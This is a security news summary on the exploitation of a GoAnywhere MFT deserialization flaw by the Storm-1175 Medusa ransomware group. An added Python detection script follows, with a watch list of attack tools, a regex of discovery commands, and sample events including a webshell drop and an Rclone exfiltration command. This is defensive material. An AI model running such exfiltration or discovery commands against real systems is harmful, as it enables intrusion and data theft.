Microsoft Links Storm-1175 to GoAnywhere Exploit Deploying Medusa Ransomware
Briefly

"The vulnerability is CVE-2025-10035 (CVSS score: 10.0), a critical deserialization bug that could result in command injection without authentication. It was addressed in version 7.8.4, or the Sustain Release 7.6.3. 'The vulnerability could allow a threat actor with a validly forged license response signature to deserialize an arbitrary actor-controlled object, possibly leading to command injection and potential remote code execution (RCE),' the Microsoft Threat Intelligence team said."
"According to the tech giant, Storm-1175 is a cybercriminal group known for deploying Medusa ransomware and exploiting public-facing applications for initial access since September 11, 2025. It's worth noting that watchTowr revealed last week that there were indications of active exploitation of the flaw since at least September 10. Furthermore, successful exploitation of CVE-2025-10035 could allow attackers to perform system and user discovery, maintain long-term access, and deploy additional tools for lateral movement and malware."
A critical deserialization bug, CVE-2025-10035 (CVSS 10.0), in Fortra GoAnywhere can lead to command injection and remote code execution without authentication and was fixed in versions 7.8.4 and Sustain Release 7.6.3. Storm-1175, a cybercriminal group deploying Medusa ransomware, exploited the flaw for initial access in September 2025. Exploitation enables system and user discovery, long-term access, and deployment of tools for lateral movement. Attackers drop RMM tools like SimpleHelp and MeshAgent, create .jsp files in GoAnywhere MFT directories, execute discovery commands, use mstsc.exe for lateral movement, establish C2 over Cloudflare tunnels, and exfiltrate data with tools such as Rclone.
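The post-exploitation chain summarised above (a .jsp webshell written into the GoAnywhere MFT tree, discovery commands spawned from the MFT process, RMM tooling, mstsc.exe for lateral movement, a Cloudflare tunnel for C2, Rclone for exfiltration) maps naturally onto endpoint telemetry. The following is an added detection example written for this summary; it is not code from Microsoft, Fortra or The Hacker News. The event schema, the GoAnywhere install path and every sample event are constructed for the example and are not real indicators from the report.

```python
"""Toy detection pass over constructed endpoint telemetry for the
post-exploitation behaviour described in the summary. Added example;
schema, paths and sample events are constructed, not real IoCs."""
import re
from pathlib import PureWindowsPath
from typing import Optional

# Assumption: GoAnywhere MFT runs as a Java service under this root.
# Placeholder path; adjust to the real deployment.
GOANYWHERE_ROOT = r"C:\Program Files\Fortra\GoAnywhere"

# Tools named in the summary, keyed to the stage each one indicates.
SUSPECT_IMAGES = {
    "simplehelp": "rmm-tool",
    "meshagent": "rmm-tool",
    "mstsc.exe": "lateral-movement-rdp",
    "cloudflared.exe": "c2-tunnel",
    "rclone.exe": "exfiltration",
}
DISCOVERY_CMDS = re.compile(
    r"\b(whoami|net\s+user|net\s+group|nltest|systeminfo|ipconfig)\b", re.I)


def _under_goanywhere(path: str) -> bool:
    """Case-insensitive prefix check against the (assumed) install root."""
    return path.lower().startswith(GOANYWHERE_ROOT.lower() + "\\")


def classify(event: dict) -> Optional[str]:
    """Return a finding label for one event, or None if it looks benign."""
    kind = event.get("type")
    if kind == "file_create":
        # A .jsp written inside the GoAnywhere tree by the MFT's own Java
        # process is the webshell pattern the summary describes.
        if (event["path"].lower().endswith(".jsp")
                and _under_goanywhere(event["path"])
                and event.get("proc", "").lower().endswith("java.exe")):
            return "webshell-drop"
        return None
    if kind == "process_create":
        image = PureWindowsPath(event["image"]).name.lower()
        for needle, label in SUSPECT_IMAGES.items():
            if needle in image:
                return label
        # Discovery commands whose parent is the GoAnywhere Java process.
        if (DISCOVERY_CMDS.search(event.get("cmdline", ""))
                and event.get("parent", "").lower().endswith("java.exe")):
            return "discovery-from-mft"
        return None
    return None


def scan(events: list) -> list:
    """Run classify() over a batch; return (label, host) pairs in order."""
    return [(label, e["host"]) for e in events if (label := classify(e))]


# Constructed sample telemetry for the example (not real indicators).
JAVA = GOANYWHERE_ROOT + r"\jre\bin\java.exe"
SAMPLE_EVENTS = [
    {"type": "file_create", "host": "mft01", "proc": JAVA,
     "path": GOANYWHERE_ROOT + r"\tomcat\webapps\ROOT\x.jsp"},
    {"type": "file_create", "host": "mft01", "proc": JAVA,
     "path": GOANYWHERE_ROOT + r"\userdata\report.pdf"},
    {"type": "process_create", "host": "mft01",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami & net user", "parent": JAVA},
    {"type": "process_create", "host": "mft01",
     "image": r"C:\Users\Public\rclone.exe",
     "cmdline": "rclone.exe copy D:\\data remote:bucket",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"type": "process_create", "host": "mft01",
     "image": r"C:\Windows\System32\mstsc.exe",
     "cmdline": "mstsc.exe /v:fs02", "parent": r"C:\Windows\System32\cmd.exe"},
    {"type": "process_create", "host": "ws07",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe", "parent": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for label, host in scan(SAMPLE_EVENTS):
        print(f"{host}: {label}")
```

The rules are deliberately narrow: the webshell and discovery checks key on the GoAnywhere Java process as writer or parent, which is the part of the chain specific to this intrusion, while the image-name matches for RMM, RDP, tunnelling and Rclone will need tuning against legitimate use in a given environment. Patching to 7.8.4 or 7.6.3 removes the entry point; these checks are for finding activity that may already have happened.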
Read at The Hacker News